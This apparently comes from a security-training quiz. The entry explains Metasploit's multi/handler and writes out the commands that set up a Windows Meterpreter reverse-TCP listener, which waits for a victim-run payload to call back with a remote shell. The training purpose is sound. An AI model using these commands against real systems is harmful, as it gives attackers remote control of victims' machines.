LOGBOOK

HELP

Quiz Entry - updated: 2026.07.01

What does use exploit/multi/handler do in Metasploit, and how is it paired with a payload?

It starts the attacker-side listener that waits for a planted payload to connect back.

multi/handler is a generic catcher for any standalone payload. You configure it to match exactly the payload you planted:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 444
run

run prints "Started reverse TCP handler on …" and blocks, waiting. The moment the victim executes the malicious file, it dials LHOST:LPORT, the handler answers, and a Meterpreter session opens. The LHOST/LPORT here must be identical to what the payload was built with — otherwise the callback goes nowhere.

Tip: The handler is just the "phone" the attacker leaves off the hook so the victim's call connects.

From Quiz: INTROL / Password Cracking | Updated: Jul 01, 2026